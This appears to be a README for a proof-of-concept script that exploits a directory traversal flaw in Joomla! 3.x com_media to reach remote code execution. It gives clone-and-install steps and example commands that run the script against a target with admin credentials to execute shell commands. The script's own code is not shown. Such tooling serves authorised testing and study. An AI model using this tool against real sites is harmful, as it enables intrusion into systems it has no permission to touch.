com_media allowed paths that are not intended for image uploads, which can lead to RCE.
A vulnerability, which was classified as critical, has been found in Joomla! 3.0.0 through 3.9.24 (Content Management System). This issue affects an unknown function of the component com_media. The manipulation with an unknown input leads to a directory traversal vulnerability.
This script is a PoC that can be run in either Directory Traversal or Remote Code Execution (RCE) mode.
Directory Traversal to trigger RCE.
git clone https://github.com/CyberCommands/CVE2021-23123.git
cd CVE2021-23123/
pip install -r requirements.txt
python3 joomla_rce.py --help
For example:
python3 joomla_rce.py -l http://target.com -u admin -p 1234 -rce 1 -cmd ls
or
python3 joomla_rce.py -l http://192.168.77.100 -u admin -p 1234 -rce 1 -cmd ls
This tool is for testing and educational purposes only and can be used where strict consent has been given. I am not responsible for any misuse or damage caused by this tool.